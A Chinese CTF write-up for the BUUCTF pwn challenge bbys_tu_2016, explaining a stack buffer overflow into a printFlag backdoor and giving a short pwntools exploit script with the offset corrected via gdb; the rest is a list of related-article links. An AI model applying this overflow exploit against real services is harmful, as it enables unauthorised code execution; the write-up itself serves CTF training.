bbys_tu_2016
2024-06-09 18:10:14
bbys_tu_2016
使用checksec查看:
只开启了栈不可执行,看样子是栈溢出的题目。
拉进IDA中查看:
将用户输入的数据写入v4,但是并没有限制写入的长度,存在栈溢出。
查看下字符串,发现后门函数printFlag():
那就直接溢出跳过来就完事。
然而事情并没有这样就结束,打了两次发现flag出不来,就用gdb调试了下:
输入的位置为0xffffd714,ebp位置为0xffffd728
实际的距离是0x14并不是IDA中所显示的0xc
exp:
from pwn import *#start
# r = process("../buu/bbys_tu_2016")
r = remote("node4.buuoj.cn",25049)#params
printFlag_addr = 0x804856D#attack
payload = b'M'*(0x14+4) + p32(printFlag_addr)
r.sendline(payload)r.interactive()
bbys_tu_2016相关推荐
- [BUUCTF-pwn]——bbys_tu_2016
[BUUCTF-pwn]--bbys_tu_2016 简单的栈溢出,不过竟然是esp寻址,害的孩子找了好久还是要动态调试 一般地址会误差八个字节 error exploit from pwn impo ...
- PWN-PRACTICE-BUUCTF-14
PWN-PRACTICE-BUUCTF-14 bbys_tu_2016 ciscn_2019_n_3 roarctf_2019_easy_pwn gyctf_2020_borrowstack bbys ...
- 持续更新 BUUCTF——PWN(一)
文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...
- BUUCTF bbys_tu_2016xm_2019_awd_pwn2
在家希望武汉的师傅们一切都好~~ bbys_tu_2016 这道有点没搞清额额flag文件是flag.txt是能control但是好像不能ROP也是能读到flag文件的就很简单了还有似乎文件没写好se ...
最新文章
- numpy之argmax()函数
- 微软宣布Azure Migrate和Site Recovery服务增强功能
- Android预优化那些事
- 3 float py 位小数 裁剪_对一个 float 精度问题的分析
- Python编程快速上手-字典
- tar中的zxvf都是什么?
- FLV视频在IIS6.0下不能播放 处理的方法
- SpringMvc 04 基于注解的映射器与适配器配置
- mysql的int多少溢出_mysql 整型(int)数字溢出在程序和数据库设计中的考虑
- JavaScript设计模式与实践--工厂模式
- 正确的座机号码格式_正确的座机号码格式
- 操作系统进程通信实验
- PHP的常用框架有哪些?
- 南京大学计算机学院刘向阳,刘向阳 南京大学计算机科学与技术系教授_光通信名人录_光邻网...
- VS Code常用快捷键
- python3 and
- 随机生成20以内加减法,5次答题并统计正确和错误题数
- 软件开发生命周期及开发模型
- mysql怎么写外键支持级联删除_MySQL外键级联删除不起作用,完全难倒
- python的秘密_Shamir秘密共享方案 (Python)